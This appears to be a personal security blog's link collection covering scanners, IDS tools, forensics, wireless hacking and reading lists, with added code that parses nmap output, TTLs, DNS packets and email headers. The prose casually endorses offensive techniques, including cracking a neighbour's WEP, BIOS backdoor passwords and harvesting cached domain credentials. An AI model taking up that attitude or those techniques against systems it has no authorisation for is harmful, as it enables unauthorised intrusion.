RT is an excellent open source (free) tool for any IT shop to track resources and requests. Even better for those not comfortable relying on a Linux solution: it can be installed on Windows.


sam spade on the web

Basically a pointer to Sam Spade.org, a site that hosts hardcore DNS online querying tools.


browser isolation: sandboxie

Application, browser, and even OS virtualization and isolation are becoming the big trends this year. In this vein, Sandboxie is an app that will sit between the OS and Internet Explorer and isolate software from messing with the OS. While this is an interesting concept, I have no clue if this will still work in IE7, and I'll stick with Firefox anyway.


sentinix

Sentinix is a Linux distro that packages all sorts of security-related tools into one package, making for an easy install. I think this may just rock. I need to try it out at work on a spare machine that I want to do basically this same thing with anyway.


windows server service buffer overrun scanner

In the past week, Microsoft released a bunch of new patches, one of which patches a critical vulnerability (buffer overrun) in the Server service.


Not a day later, an exploit was unleashed and the vulnerability itself is wormable. eEye released a scanner to scan small ranges of IPs for vulnerable servers. Nice scanner, and I hope Metasploit incorporates this exploit very soon.


snort 2.2.0 released

Snort 2.2.0 has been released.


Also, here is a Sguil installation guide. Sguil is a GUI interface for Snort to provide alerts and other functionality.


spamassassin

SpamAssassin actually can work on a win32 platform and with any email client that I use, which means I don't have much excuse for not trying this out at some point on my home network.

speeding up a nessus scan

Nessus can take a while to scan a range of hosts, especially if that range involves a lot of down or unused IPs. This link goes into some detail on how to perform an nmap scan to populate what Nessus will scan, and since nmap does this scan much faster, the overall scan from Nessus takes far less time.
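One way to do the handoff the link describes, as an added example (not code from the linked write-up or from Nessus/nmap): run a host-discovery sweep with nmap's greppable output (`-oG`), pull out only the hosts that answered, and feed that list to Nessus so it never wastes time on dead addresses. The greppable output below is constructed to look like such a file; the file name and sweep options are assumptions.

```python
"""Turn nmap greppable output (-oG) into a Nessus target list.

Added example, not from the linked write-up. It assumes a discovery sweep was
run with something like `nmap -sP -v -oG hosts.gnmap 192.168.1.0/29` and
parses the result; SAMPLE_GNMAP below is constructed to look like that file."""

import re

# "Host: <ip> (<name>)<tab><rest of line>"
HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)\s+(.*)$")


def live_hosts(gnmap_text):
    """Return live hosts in the order nmap printed them, without duplicates.

    A host counts as live if a line says 'Status: Up' or if it has a 'Ports:'
    line (nmap only lists ports for hosts it found up)."""
    seen = set()
    live = []
    for line in gnmap_text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # '#' comment lines and anything unexpected
        ip, rest = m.group(1), m.group(3)
        if ("Status: Up" in rest or rest.startswith("Ports:")) and ip not in seen:
            seen.add(ip)
            live.append(ip)
    return live


def nessus_targets(gnmap_text):
    """Comma-separated form that can be pasted into the Nessus target field."""
    return ",".join(live_hosts(gnmap_text))


# Constructed sample of greppable output (tabs separate the fields, as nmap writes them)
SAMPLE_GNMAP = """\
# Nmap 4.01 scan initiated Wed Jun 14 21:02:10 2006 as: nmap -sP -v -oG hosts.gnmap 192.168.1.0/29
Host: 192.168.1.1 ()\tStatus: Up
Host: 192.168.1.2 ()\tStatus: Down
Host: 192.168.1.3 (fileserver.lan)\tStatus: Up
Host: 192.168.1.3 (fileserver.lan)\tPorts: 139/open/tcp//netbios-ssn///\tIgnored State: closed (999)
Host: 192.168.1.4 ()\tStatus: Down
# Nmap done at Wed Jun 14 21:02:15 2006 -- 8 IP addresses (2 hosts up) scanned
"""

if __name__ == "__main__":
    print(nessus_targets(SAMPLE_GNMAP))
```

Writing the result of `live_hosts()` one address per line gives a file that Nessus can read as its target list; the `Ports:` fallback matters because a port-scan run without `-v` does not print `Status:` lines for every host.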


ssh server on windows 2003

Appears to be a paper on installing an SSH server on Windows 2003. There are other tools that don't require Cygwin, but I think this will be a good exercise to go through. I've long wanted my own SSH server here at home for...various reasons.


protected storage passview tool

Protected Storage PassView allows one to see a number of passwords in Windows: Outlook passwords, AutoComplete passwords in IE, Password protected sites in IE, and MSN Explorer passwords. Pretty nice for one of those "other" password revealing tools.


tcpreplay

Tcpreplay is one of those tools I've heard referenced a hell of a lot of times, but still have yet to really utilize it. I need to someday, hence this pointer.


This TCP Tunnel tool forces traffic from an application to a specified proxy server. Looks like just someone's little self-made tool, but worth checking out at some point.


the hacker's choice - hydra, amap tools, more

The Hacker's Choice, aka THC, is a top source for original security tools such as Hydra and Amap and many more. Nice site to browse and try a few things out from. They also have plenty of nice papers too.


firewall probing with ttlscan

This little tool called ttlscan sends a series of TCP SYN packets to ports on a particular server and then returns a report of the replies. By reading the TTL field of the reply packets, one can tell if the device is forwarding a port to another server behind it (the TTL will be one less, because the reply crossed one extra hop). There is also limited OS fingerprinting available with it.
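The analysis side of that technique, as an added example (not ttlscan's own code, and it sends no packets): given the TTL observed on each port's reply, guess the initial TTL the sender's stack used, derive the hop distance, and flag ports whose replies came from one hop further away than the rest. The same initial-TTL guess is what the "limited OS fingerprinting" amounts to. The observations and OS-family table below are constructed and heuristic.

```python
"""TTL-based hop analysis in the spirit of the ttlscan entry.

Added illustration, not code from ttlscan. The probe itself is not implemented;
the input is a list of (port, observed_ttl) pairs, constructed here by hand,
as such a tool would report them."""

from collections import Counter

# Initial TTLs most IP stacks use; the OS-family hints are a rough heuristic
INITIAL_TTLS = (32, 64, 128, 255)
TTL_FAMILY = {32: "legacy Windows", 64: "Linux/BSD-like",
              128: "Windows", 255: "Solaris/network device"}


def initial_ttl(observed):
    """Smallest common initial TTL the observed value could have started from.
    Ambiguous on very long paths (64 seen could be 64-0 or 128-64); the nearest
    value is the usual assumption."""
    for ttl in INITIAL_TTLS:
        if observed <= ttl:
            return ttl
    raise ValueError("TTL above 255 is not valid")


def hops_away(observed):
    """Number of routers the reply crossed, given the initial_ttl() guess."""
    return initial_ttl(observed) - observed


def analyze(observations):
    """Group replies by hop distance and flag ports that answered from further
    away than the majority: the probed device is likely forwarding those ports
    to another host behind it."""
    per_port = {port: hops_away(ttl) for port, ttl in observations}
    baseline = Counter(per_port.values()).most_common(1)[0][0]
    forwarded = sorted(p for p, h in per_port.items() if h > baseline)
    os_hints = sorted({TTL_FAMILY[initial_ttl(ttl)] for _, ttl in observations})
    return {"baseline_hops": baseline, "forwarded_ports": forwarded,
            "per_port": per_port, "os_hints": os_hints}


# Constructed sample: a Windows-based firewall 8 hops away answers 22/25/53
# itself, while 80 and 443 are handed to a Linux web server one hop behind it.
SAMPLE = [(22, 120), (25, 120), (53, 120), (80, 55), (443, 55)]

if __name__ == "__main__":
    print(analyze(SAMPLE))
```

The forwarded ports show up as a hop count one above the baseline; the two different initial-TTL guesses (128 and 64) are the only "fingerprint" this approach yields, which is why the entry calls it limited.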


txdns digger for windows

Windows gets a tool here, in infant form, for DNS digging. DNS digging is always good to automate, and this looks like it does a nice job of it.


vmware appliance contest winners

VMware recently held a competition to create awesome virtual appliances. Some of the entries look like solid, useful things, especially the winner which looks like a network packet capture analyzer appliance which I'd love to run. Familiarizing myself with VMware player and the ability to slap in an appliance like this could be highly useful.


wapiti

Wapiti is an OS-independent web app vulnerability assessor and fuzzer tool written in Python. Whew! I swear, the names of these tools have gone from the vulgar and dark voodoo magic arts (BackOrifice, AOHell...) into the just plain odd. Anyway, it looks like a tool worth checking out for doing some web app fuzzing. It definitely does not replace Nikto or something, but can definitely take web app scanning to a new, deep level.


wget for windows

How can one complain about a wget for windows app?


wholockme?

WhoLockMe is a Windows tool to determine what process is locking a file.


winalysis

Winalysis is a tool that just might make life much simpler for the desktop support team, at least in tracking things on our network....and maybe on a few of the more accessible servers in our network. According to the marketing, Winalysis can gather event log files from multiple machines and archive them centrally, can generate alerts based on events, and analyze changes and security vulnerabilities. One thing I am looking for is a way to verify the integrity of system files, basically to ensure the files have not been tampered with, but also a tool that can gather event logs for 100 or so machines, put them all together, and flag or send alerts on just a few specific issues such as new user creations, multiple logon failures, admin account logons, etc.


And the tool is amazingly cheap too! And a fully functional trial version! And no client installs! I might just have to try this out and see how it might fit into our whole network management scheme.


windows bootable cd

Linux CDs are nothing new to me, and they're great little tools. I found a few links to a site describing how to create a Windows bootable cd. This would be amazingly useful, and basically totally one-ups the Windows 98 boot cd that I keep in my possession. Of interest, the person who hosts this page is also the one I have bookmarked for anytime I need to create a network-enabled boot disk for Windows when I do imaging.


winpooch

Winpooch is one of those tools for Windows that you never really expect to see. Tools like this tend to be *nix only. Winpooch feels a lot like a mix between a heuristic antivirus app, Tripwire, and a host-based firewall. It monitors and can take action based on what programs do against the OS, file system, and network. If a program wants to access the Internet, Winpooch watches it and can block it. If the program wants to write a registry key or drop a file on your computer somewhere, Winpooch can log or block it as well. For those people curious about things like this, or just plain paranoid, this seems like a nice, lightweight tool for monitoring one's system. Best of all, it is open source and fully free (although I truly expect this to be bought up in the future). It has extended integration into ClamWin antivirus too, which I use!

.: wireless probe detection and mac spoofing detection
PolarCove has a number of nice papers on their site, but of particular interest is a paper on wireless LAN discovery tools and wireless MAC spoofing detection. Both papers include exact Ethereal/Wireshark filters to use.
.: myths about security and passwords
This post is an interesting viewpoint on myths about security and passwords. Most "out there" is the opinion that changing passwords regularly is now dead and does not enhance security at all.
.: how to bypass bios passwords
I've long kind of had an idea that makers would put backdoor passwords into BIOS implementations, but never really looked into it. Then I happened upon this posting one day which lists a lot of backdoor passwords for various BIOS platforms and versions. Pay particular attention to the mention that some BIOS lock themselves after a few incorrect attempts, so be cautious. I've not tested any of these, but it would be very fun to play with.
.: managing the prefetcher
Not many people realize there is a component to Windows XP called the Prefetcher. Even fewer desktop/system support people realize the significance of it. This prefetcher for Windows keeps a cache of a lot of programs downloaded by Windows, and acts independently of IE. So if you clear your cache in IE, your downloaded files might still be found in the prefetcher. Most people are tipped off to this location only after a piece of malware has been downloaded (automatically or by accident) and a copy was saved in the prefetch area of Windows, generating an AV alert pointing to this location. This short link is a start to managing the prefetcher cache.
.: create own services in windows
Creating services in Windows is one of those frustratingly annoying things that many people would love to do, but is typically difficult to find information on how to do it. In fact, you can't really do it unless you're a programmer or you have some extra tools from Microsoft. I guess this prevents every John Doe Idiot from completely screwing up their computers with crappy service lists. I am happy to have found this quick post on how to create your own services.
.: rrdtool to monitor wireless link
This is an awesome article on how to use RRDTool to monitor a wireless network.
.: external attacks - overview
This is a monster article on external attacks, largely from the point of view of Linux since this was in a Linux magazine. Many books cover this entire spectrum in hundreds of pages, but this article condenses it down nicely, albeit it is really packed with info.
.: malware analysis: attacking the attackers
Malware is an amazing little hobby to have, and these two papers cover malware analysis brilliantly.

part one
part two
.: roguescanner
RogueScanner is a rogue wireless access point detection tool. Pretty cool...and it's free! Also peek at the other free tools available here, Packetyzer (an Ethereal front-end, as if there needs to be another one...) and BlueScanner, which scans for Bluetooth devices. To be honest, both of the scanner tools are pretty nice for being free tools!
.: cracking wep on windows
Wow, just wow! This is one of the hottest and best links I've seen in a long time. I HAVE to try this out. I've worked on cracking WEP before on my neighbors, but I always had to resort to using a livecd Linux install (since I don't have a permanent Linux box around). Cracking WEP with Windows XP is a huge, detailed, complete article which I am tempted to actually copy/print just to make sure I always have it.

This was found whilst checking out a site I'd not seen before: wardriving.com.
.: netbios null sessions
NetBIOS Null Sessions are elementary and a first stop for anyone performing system recon. They should always be turned off, and this link is a nice reminder of the issues, the dangers, and the fixes.
.: insertion, evasion, and denial of service
The paper, Insertion, Evasion, and Denial of Service: Eluding Intrusion Detection, is the definitive guide to beating IDS and has been the foundation of IDS attacks ever since. I must read this sometime, for historical reasons and more.
.: dns cache snooping
Having just watched Dan Kaminsky's Black Ops of TCP/IP 2005 presentation that he gave at the 22nd Chaos Communications Congress, I have a couple links on dns snooping, which he (in typical Kaminsky fashion) utilized in creative fashions. First, a paper on dns cache snooping. And second, a site on how dns snooping actually works.
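What the snooping technique rests on, as an added example (not from either linked paper and not from Kaminsky's talk): a query with the RD (recursion desired) bit cleared asks the resolver to answer only from what it already has, so getting an answer means someone recently looked that name up, and the answer's TTL (lower than the zone's) says roughly how long ago. Nothing is sent here; the server side is a constructed reply builder, and the names, IDs and TTLs are made up. The last function is the detection side: on a resolver, non-recursive queries from outside are the indicator to watch for.

```python
"""Minimal DNS wire-format helpers showing what cache snooping relies on.

Added illustration, not from the linked papers. No packets are sent; the
resolver's reply is built by a constructed helper for the demo."""

import struct


def encode_name(name):
    """'example.com' -> b'\\x07example\\x03com\\x00'"""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def build_query(name, txid, recursion_desired=False, qtype=1):
    """A-record query; RD cleared by default, which is the snooping variant."""
    flags = 0x0100 if recursion_desired else 0x0000
    header = struct.pack("!HHHHHH", txid, flags, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, 1)


def build_response(query, a_records, authoritative=False):
    """Constructed stand-in for the resolver: echoes the question and appends
    one A record per (ipv4_string, ttl). An empty list is a cache miss."""
    txid = struct.unpack("!H", query[:2])[0]
    flags = 0x8080 | (struct.unpack("!H", query[2:4])[0] & 0x0100)  # QR, RA, copy RD
    if authoritative:
        flags |= 0x0400  # AA
    header = struct.pack("!HHHHHH", txid, flags, 1, len(a_records), 0, 0)
    body = query[12:]  # question section, unchanged
    for ip, ttl in a_records:
        body += b"\xc0\x0c"  # compression pointer to the question name
        body += struct.pack("!HHIH", 1, 1, ttl, 4) + bytes(int(o) for o in ip.split("."))
    return header + body


def read_name(data, off):
    """Decode a possibly compressed name; return (name, offset after it)."""
    labels, end = [], None
    while True:
        length = data[off]
        if length & 0xC0 == 0xC0:  # pointer: two bytes, then continue elsewhere
            if end is None:
                end = off + 2
            off = struct.unpack("!H", data[off:off + 2])[0] & 0x3FFF
            continue
        off += 1
        if length == 0:
            break
        labels.append(data[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels), end if end is not None else off


def parse_response(data):
    txid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", data[:12])
    off = 12
    for _ in range(qd):
        _, off = read_name(data, off)
        off += 4  # qtype + qclass
    answers = []
    for _ in range(an):
        name, off = read_name(data, off)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", data[off:off + 10])
        off += 10
        rdata = data[off:off + rdlen]
        off += rdlen
        if rtype == 1 and rdlen == 4:
            rdata = ".".join(str(b) for b in rdata)
        answers.append({"name": name, "type": rtype, "ttl": ttl, "rdata": rdata})
    return {"id": txid, "rd": bool(flags & 0x0100), "ra": bool(flags & 0x0080),
            "aa": bool(flags & 0x0400), "rcode": flags & 0x000F,
            "ancount": an, "answers": answers}


def looks_cached(parsed):
    """For a non-recursive query: answers present and AA clear means the
    resolver served the record from its cache."""
    return parsed["ancount"] > 0 and not parsed["aa"]


def is_snoop_query(data):
    """Detection side: an incoming query (QR=0) with RD=0 is the tell-tale."""
    flags = struct.unpack("!H", data[2:4])[0]
    return not (flags & 0x8000) and not (flags & 0x0100)
```

Comparing the returned TTL with the zone's configured TTL (the remaining 1387 seconds of a 3600-second record in the test below) is how the snooper estimates when the name was last requested; limiting who may send non-recursive queries to a resolver is the usual mitigation.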
.: logparser site and book
I should get the Log Parser book sometime, as it goes over things on this site about the Microsoft Log Parser tool. This should be useful for performing ad hoc and maybe some scripted queries against single logs or groups of logs.
.: defeating a dos attack
SANS has a bit on defeating a DoS attack. They also have a webcast I'd like to check out on the same topic.
.: checkmate forensics blog and links
There is a fairly new blog out called Checkmate that deals with forensics and other things security. Here are some choice pieces to check out so I can catch up:

rainbow tables
timestomp
xp's built-in spyware
userassist
apache and squid logs
.: sql injection examples
A thorough examination of sql injection attacks using examples.
.: anatomy of an attack
A SANS Tool Talk Webcast: Anatomy of an Attack.
.: cracking cached windows domain credentials
Cleaning out some old bookmarks I came across this pretty cool find: a forum tutorial on recovering and then cracking cached domain credentials on a Windows machine. Not only is this tutorial practical to follow and use, but it gives ammunition to anyone who challenges setting Windows cached credentials to 0. Sadly, this butts right up against laptop users who, when they log in at home, need the cached credential to use the system.

For possible future pen-test work that I'd love to do someday, this might be useful to test policy. If I can get my hands on a system or even get a local admin to come over and troubleshoot my system by logging in as himself, I can use that cached credential and crack it. This is exactly why I made sure to let users log in right after I had been logged into their machines to clear the 1 cached credential that I allowed my systems to retain.
.: case of a wireless hack
This is a LinuxExposed article on wireless hacking.
.: open source hotspots
PublicIP.net has open source (read: free!) tools for hotspot operators. Granted, the tools are not *quite* as feature-laden as expensive commercial tools, but I must say this looks pretty darn amazingly useful anyway, especially for small coffeeshops or local hotspots as opposed to the national franchises or hotels or something.
.: airpwn - http injection on 802.11b networks
Airpwn is a quick C tool that can inject http content (and other content) into wireless 802.11b networks. Tested at Defcon12; supposedly the only reliable part of the tool is to replace all http images with an image/redirect of your choosing. Might be interesting to play with on a nix box.

Update: article on using airpwn.
.: illustrated guide to crypto hashes
Illustrated Guide to Cryptographic Hashes
.: hacking the friendly skies
NRMC has posted a presentation delivered at ShmooCon this year on Hacking the Friendly Skies. The presentation starts out like most any discussion on wireless security, but then takes a turn for the sinister by delving into FakeAP attacks. What really makes this presentation excellent are the later reports of just how many systems were found. When you combine Windows XP's affinity for associating to anything that says hello with users' affinity for not patching their systems and not running a firewall, you get some pretty satisfying results. And if you look closely, some of the vulnerable systems belonged to some pretty trusted/important-sounding people. Yikes!
.: information overload

Information Overload. Kind of hard to admit that I am nearing that point, since I completely love learning things and absorbing knowledge. But the IT, techie, world has been doing that to me lately...really kicking my ass. I want to learn so much, catch up on things over the years that I missed because I wasn't a packet geek or into coding as a child (yeah, right!). I have an entire different part of this site dedicated to postings and news and links and tidbits of knowledge that I have happened across in the past few years (I keep these separate because, well, it's just for me). I have a huge list of bookmarks in my web browser that are "pending" things to check out, usually tools, large sites, or long papers that I didn't have time to fully deal with back when I was made aware of them. I have dozens upon dozens of books that are half-started or not yet read...as if just owning them means I can somehow claim the knowledge locked away.

I don't have enough hours in my day, enough days in my life, to learn all this stuff like I want to learn it. That's frustrating beyond belief.

Couple this with my recent soul-searching about my career. I love my career to date and where it is going, but I've had some thoughts that maybe specializing a bit more would be beneficial.

Now that I was working on "that other" part of my site that will remain mysteriously locked away, I have realized that my categorizing of information is almost manic at this point. It is still a mess and I'm not happy with having all this knowledge in front of me and just not having the time to get to it. Maybe I should specialize that too?

It kinda makes sense, but while I am happier to do this with my young career, I'll likely not adopt that quite too soon with my thirst for knowledge...but I certainly need to slow down and instead of blitzing this realm, to sit back, clear off the desk, and focus on a few things at a time and truly enjoy and experience them.

.: attacking a cisco router with snmp/gre
This paper is very advanced using a lot of different skills, but it does demonstrate how to abuse SNMP on a Cisco router to get its configuration file, and then have some fun with Generic Routing Encapsulation (GRE).
.: tips to harden a linux system
There are scripts and various automatic ways of hardening a Linux system, but nothing is more informative and instructive than doing many of the tweaks and settings manually. I liked this post because it really delved into a few of the particulars and exactly what is going on.
.: pictures from cdc2005
Link to pictures of the CDC 2005 event at Iowa State University. The CDC is the CyberDefense Competition held at ISU where teams of students attempt to defend their networks against a team of attackers (usually area professionals) over the course of an entire weekend. The event is reminiscent of Defcon's Capture the Flag, but with a much more instructive mentality. I wish we had this much stuff in this field at ISU back when I was a student! A version of this is also being held annually where high school teams are the defenders and college students are the attackers.
.: cissp study guides
This link I have not tried recently, but I believe these are still free study guides for the CISSP and should still be pretty informative. I read one or two about a year or more ago, and filed away the link for a time when I could more fully pursue the CISSP. I believe these are from Shon Harris and hosted by this site as a sponsor.

Of note, Shon Harris also has CISSP training that you can pay for and attend.
.: chief espionage officer
Want to become a Chief Espionage Officer?
.: using iptables to monitor bandwidth
You can also use iptables to monitor bandwidth.
.: get hired as a pen tester
One of my favorite blogs, Security Monkey (or A Day in the Life of an Information Security Investigator), made a post about how to increase your chances of getting into the lucrative and fun field of penetration testing. The comments are nearly as good as the post itself and I definitely wanted to keep this around.
.: cnn on laptop security
Wow, I never thought I would see an article on CNN.com that had some technical merit! CNN questions laptop security and why exactly is sensitive data finding its way to mobile devices in the first place? Excellent question!
.: the invisible things blog - blue pill / red pill
Blue Pill and Red Pill are part of some new research into hardware abstraction and virtualization where a system can be fully controlled by an attacker if he/she can get an abstraction layer between the OS and the hardware...well, then it's game over. Thankfully, this is not easy and does require physical access. Nonetheless, cutting-edge creativity is quite interesting.
.: email header discussion
Email headers are a simple thing, but when you're in a bind and needing to read one or more, they can sometimes be such an annoyance. This paper is a full-blown discussion on email headers and what they mean. Quite a nice read, to be honest.
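The part of header reading that bites most often is the Received: chain, so here is an added example (not from the linked paper) that walks it: each mail server prepends its own Received: line, so the top one is the last hop and the bottom one is nearest the sender, and only the line added by your own server is trustworthy since anything below it can be forged. The message is constructed, and the host names and addresses are made up (documentation ranges).

```python
"""Reconstruct a message's path from its Received: headers.

Added example, not from the linked paper. SAMPLE_MESSAGE is constructed."""

import re
from email import message_from_string
from email.utils import parsedate_to_datetime

# "from <helo-name> (<reverse-dns> [<ip>]) by <receiving-host> ..."
RECEIVED_RE = re.compile(r"from\s+(\S+)(?:\s+\(([^)]*)\))?\s+by\s+(\S+)", re.IGNORECASE)


def received_chain(raw_message):
    """Return hops in chronological order (sender first). Each hop carries the
    HELO name the client claimed, the reverse DNS the server saw, the IP, the
    receiving host and the server's timestamp (None if unparsable)."""
    msg = message_from_string(raw_message)
    hops = []
    for value in reversed(msg.get_all("Received", [])):  # bottom header = first hop
        flat = " ".join(value.split())  # undo header folding
        m = RECEIVED_RE.search(flat)
        if not m:
            continue  # non-standard Received: line, skip it
        helo, paren, by = m.group(1), m.group(2) or "", m.group(3)
        ip = re.search(r"\[([0-9.]+)\]", paren)
        rdns = paren.split()[0] if paren else ""
        stamp = flat.rsplit(";", 1)[1].strip() if ";" in flat else ""
        hops.append({"helo": helo, "rdns": rdns, "ip": ip.group(1) if ip else "",
                     "by": by, "time": parsedate_to_datetime(stamp) if stamp else None})
    return hops


def suspicious_hops(hops):
    """Hops where the claimed HELO name did not match what the receiving
    server resolved ('unknown' means no reverse DNS at all)."""
    return [h for h in hops if h["rdns"] == "unknown" or h["helo"] != h["rdns"]]


# Constructed message: three hops, the first from a client with no reverse DNS
SAMPLE_MESSAGE = "\n".join([
    "Received: from mx2.example.org (mx2.example.org [192.0.2.20])",
    "\tby mail.example.net (Postfix) with ESMTP id 123ABC",
    "\tfor <alice@example.net>; Mon, 12 Jun 2006 10:03:11 -0500",
    "Received: from relay.example.com (relay.example.com [198.51.100.7])",
    "\tby mx2.example.org (Postfix) with ESMTP id 9F7A1;",
    "\tMon, 12 Jun 2006 10:03:05 -0500",
    "Received: from desktop (unknown [203.0.113.45])",
    "\tby relay.example.com (Postfix) with SMTP id 77B2;",
    "\tMon, 12 Jun 2006 10:02:58 -0500",
    "From: bob@example.com",
    "To: alice@example.net",
    "Subject: header walk",
    "",
    "body text",
    "",
])

if __name__ == "__main__":
    for hop in received_chain(SAMPLE_MESSAGE):
        print(hop)
```

Timestamps that run backwards from hop to hop, or a hop whose HELO name and reverse DNS disagree, are the usual signs that the lower part of the chain was written by the sender rather than by real servers.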
.: setting up cisco pix and other networking papers
What pulled my attention here is a couple papers on Setting Up Cisco Pix Firewalls, but in browsing the rest of the site, all of these papers look very interesting.
.: 10 books from information security and 10 from richard bejtlich
Here is a list of Top 10 books as suggested by Information Security magazine.

Firewalls and Internet Security: Repelling the Wily Hacker, Second Edition by William R. Cheswick, Steven M. Bellovin, Aviel D. Rubin
This perimeter security text is perfect for serious security professionals. The authors have mastered the art of applying the theoretical to actual working applications; the result is pragmatic advice from some of the finest minds in the field.

Hacking Exposed, Fifth Edition by Stuart McClure, Joel Scambray, George Kurtz
The original edition ushered in a new era of computer security publishing, offering unabashed, technically detailed and fully documented instructions on how to subvert the security of a multitude of systems. Although some scoff at the series, perhaps they just hate to see some of their secrets published.

Applied Cryptography by Bruce Schneier
Any book that the National Security Agency prefers to remain unpublished is bound to make great reading. Anyone doing serious work with cryptography needs a copy. With a comprehensive and excellent explanation of encryption of all kinds, this book is second to none.

Practical Cryptography by Bruce Schneier, Niels Ferguson
Schneier's sequel to Applied Cryptography will help you apply your newfound cryptographic skills successfully and securely. Think of them as volumes one and two of the same book.

Practical Unix & Internet Security by Simson Garfinkel, Gene Spafford, Alan Schwartz
The authors deliver an excellent introduction to a wide variety of computer and network security issues within UNIX.

Security Engineering by Ross Anderson
This book details security design and implementation strategies employed in real-world systems. Although many publishers employ strategies attempting to inflate the page count (and price) of a book, this 600-page masterpiece could only result from the dedication of an extremely knowledgeable veteran of the field.

The Tao of Network Security Monitoring by Richard Bejtlich
"Tao" means "The Way," and that's what this book is: the way to evolve IDS operations. The network security monitoring philosophy is both obvious and completely revolutionary.

The Art of Computer Virus Research and Defense by Peter Szor
Szor's mastery of virus/antivirus technology is unparalleled, and this comprehensive tome is the definitive work on the subject. Although parts are inaccessible to all but experienced assembly language programmers, antivirus is such a critical technology that every professional should read this book, if only to understand the problem.

A Guide to Forensic Testimony by Fred Chris Smith, Rebecca Gurley Bace
As security pros, we stand a higher-than-average chance of being called into court to testify about the results of our investigations. The authors do a good job of explaining the challenges associated with information security cases and how to give the best testimony possible.

Spam Kings by Brian McWilliams
This behind-the-scenes account of real-life spammers and spam fighters is a must-read for anyone trying to squelch junk e-mail. There's a freak show in here, but also a lot of good intelligence on the inner workings of the spam kings.


And Richard Bejtlich's Top 10.
.: wireless certifications
I was going to post a nice list of wireless certifications and courses, but this site sums them up better than my list would do. Definitely took in all the ones I had unearthed and more.
.: top 10 infosec skills
Dan Morrill posted a list of his top 10 information security skills to have. I really like this list, and it certainly gives me something to use as a benchmark other than just what appears on my resume or certs I might hold. Considering Dan manages teams like this, that makes him the best opinion out there, really.
.: cisco pix firewall chapters
Getting started with the Cisco Pix firewall

Pix failover demystified
.: upside-down-ternet
This little trick is not necessarily wireless-only, but awesome nonetheless. Using a proxy and some other tools, one can mess with http traffic to unwanted wireless guests such as turning all images upside-down, instead of just outright denying them access. Pretty cool and fun! Reminds me a lot of airpwn, only this would be a wired version using squid.
.: wireless net security presentation
A nice presentation on wireless security. Pretty nice detail on what is going on.
.: blue security and prolexic knocked off by upstream attack
I have a ton of respect for Prolexic and what they offer to our world. But the spammers and botnets have waged a mini-war against Blue Security and anyone who seems to assist them. But instead of directly attacking Prolexic, a botnet was leveraged against upstream DNS servers for UltraDNS. Wow, just wow. This is the sort of cyberwarfare that is coming or already here where masses of zombied computers are wielded. So far much of this has been individual hackers or groups with personal beefs, but much like phishing and virus attacks, I expect things like this to take a much more organized and sinister turn in the next 4 years.
.: security awareness posters
Sometimes you just need to inject some "security awareness" points into your training program. "Protect Your Workplace" posters from the federal government are an inexpensive and easy way to start.

And search this page for the security calendar.
.: wireless injection: wireless networks suck
This presentation on wireless injection was given in June 2005 at RECON. PowerPoint slides without the talk tend to be pretty barren in terms of getting the gist of what the speaker is trying to say, but it might be ok to check out someday.
.: the noc water cooler topics
It is interesting to see the trend of what is hot in security and networking and sysadminness. The turn of the millennium brought in virtualization, and a few years ago Metasploit broke onto the scene in a big way. Wireless and mobility have been amazingly hot in the last 6 years as well. And now that web apps are being developed by everyone, web app testing and security is catching up. In all of this, I thought it would be nice to keep track, for my own purposes, of the hot topics at periodic times of the year just to see where things are moving and shaking.

1. web application / layer 7 security / fuzzing - driven by a huge focus in the past 8 months on MS Office vulnerabilities and browser exploits.

2. mobility - driven by laptops being used and lost in the field, prompting a huge number of disclosures of lost information that questionably should not have been outside the corporate/gov't environments anyway.

3. disclosure and identity theft - Just about everyone has been joining the disclosure bandwagon whether they like it or not, from the VA, Deloitte and Touche, and many universities (poor edu's will always have a tough open vs secure battle). This will only get worse and hopefully soon the media stops waving each one that happens.

5. botnets and ddos - Blue Security wanted to beat spammers by spamming them. Instead, Blue Security got DDoSed so hard, they are now out of business and have thrown in the towel. Botnets have been widely reported in the past couple years, but they still seem to grow and remain huge and potent.

4. wireless - wireless is just waiting to blow up, with hotspots getting more common and big companies with secret plans on widespread wireless for the masses. Since wireless is still hugely exploitable and fun to mess with, this is just waiting for a huge lashback and a huge outbreak in personal systems being exploited over wireless. Home users haven't been this vulnerable to being rooted since NAT was hardly used on broadband connections. This is an area that is also just waiting to explode with use and companies and widespread access.

Mentions and tools: Metasploit is still hot and HD Moore is one of the biggest names in security right now; virtualization is still hot; Office and IE are getting hammered with exploits which is keeping Microsoft very busy; LiveCDs are all over the place now, joining the awesome Knoppix (BackTrack owns).
.: using ubuntu to crack wep
Tutorial on how to crack WEP using Ubuntu.
.: metasploit malware search
You can search for malware using Google, right down to infected sites inadvertently sharing out malware code (executables). Damn cool stuff, and damn cool site. Search for "Bagle" for a good example.
.: sans packet challenge
I need to check this out sometime. The packet challenge at SANS is not a regular thing, I think, but could still make for an interesting exercise for me. Bejtlich posted a couple links to answers here and here.
.: infosec training modules / presentations
Not sure on the quality of this content, but this site has some modules up about their training in infosec assurance and assessments. I'll take this down if this proves to be useless fluff.
.: ftester - test your linux firewall
So, when I get around to testing my linux firewall, I can use ftester along with this "how to" guide.
.: reverse engineering khallenge
The folks at F-Secure put up this series of exercises in reverse engineering and called it a khallenge. Sounds like a fun way to get into reverse engineering a bit, someday. If I get stumped, might be able to find some hints around this blog.
.: office metadata and forensics
A post over at SecurityFocus went over Microsoft Office forensics and some things to do to enhance security, most notably privacy. Because Office is so universally used, I've found that many people, techie and non-techie both, want to put their heads in the sand about issues with Office. They just don't want to hear about the issues, even as malicious persons have begun poking at the apps and more and more data is disclosed on the web and search engines.

I've long wanted a concise and listed set of items to check on and change when dealing with metadata in MS Office Word documents. Now I have it!

Update: Here is another link dealing with pesky lingering Office data that shouldn't be there.
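Since the whole point of that checklist is knowing which fields to look at, here is an added example of mine (not code from the SecurityFocus post) that lists and scrubs them programmatically. It assumes the document is in the zipped OOXML container (.docx, Office 2007 and later); the binary .doc format keeps the same author/company/revision fields in OLE property streams and needs an OLE parser instead. Standard library only; the sample document is constructed inline.

```python
"""List and scrub the metadata Word keeps alongside a document's text.

Added example, not from the SecurityFocus post. It assumes the file is in
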